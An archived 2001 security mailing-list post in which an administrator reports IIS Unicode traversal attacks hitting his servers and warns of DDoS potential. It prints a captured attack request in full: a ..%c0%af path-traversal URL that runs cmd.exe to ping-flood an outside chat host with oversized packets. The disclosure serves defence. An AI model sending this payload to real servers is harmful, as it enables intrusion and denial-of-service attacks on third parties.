Strage IIS UNicode

From: Yoann LeCorvic (Yoann.LeCorvic@infrasoft-civil.com)
Date: Fri May 25 2001 - 02:22:14 PDT

Next message: Ofir Arkin: "Re: ICMP 8.255?"

Previous message: Jose Nazario: "Re: another wave?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi

In the past monthe I get quite a few of IIS Unicode attacks, but a bi
strange. Thecome from a bit everywhere, and are very similar. It trie to
use the vulnerability do ping other machines.

47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25  c0%af..%c0%af..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25  c0%af..%c0%af..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25  c0%af..%c0%af..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69  c0%af..%c0%af/wi
6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64  nnt/system32/cmd
2E 65 78 65 3F 2F 63 25 32 30 70 69 6E 67 25 32  .exe?/c%20ping%2
30 2D 76 25 32 30 74 69 6D 65 73 74 61 6D 70 2D  0-v%20timestamp-
72 65 70 6C 79 25 32 30 2D 6E 25 32 30 39 39 39  reply%20-n%20999
39 39 39 39 39 39 39 39 39 39 39 25 32 30 2D 6C  99999999999%20-l
25 32 30 36 35 35 30 30 25 32 30 2D 77 25 32 30  %2065500%20-w%20
30 25 32 30 64 75 6E 67 65 6F 6E 66 79 72 65 2E  0%20dungeonfyre.
66 78 63 68 61 74 2E 6E 65 74 0D 0A              fxchat.net..

This could be used for DDOS as the number of packets is high, as well
as the size ?

Watch out...




Yoann Le Corvic - Internet Administrator
Email : yoann.lecorvic@infrasoft-civil.com
Web : http://www.infrasoft-civil.com/
========================
Infrasoft Ltd
North Heath Lane
Horsham, West Sussex RH12 5QE
United Kingdom
Tel : +44 (0)1403 259511
Fax : +44 (0)1403 217728


**********************************************************************
The information contained in this message or any of its
attachments is confidential and is intended for the
exclusive use of the addressee. The information may also
be legally privileged. The views expressed may not be
those of Infrasoft, but the personal views of the originator.
If you are not the addressee, any disclosure, reproduction,
distribution or other dissemination or use of this
communication is strictly prohibited. If you have received
this message in error, please contact :
postmaster@infrasoft-civil.com and delete this message.
**********************************************************************"

Next message: Ofir Arkin: "Re: ICMP 8.255?"
Previous message: Jose Nazario: "Re: another wave?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 25 2001 - 10:51:12 PDT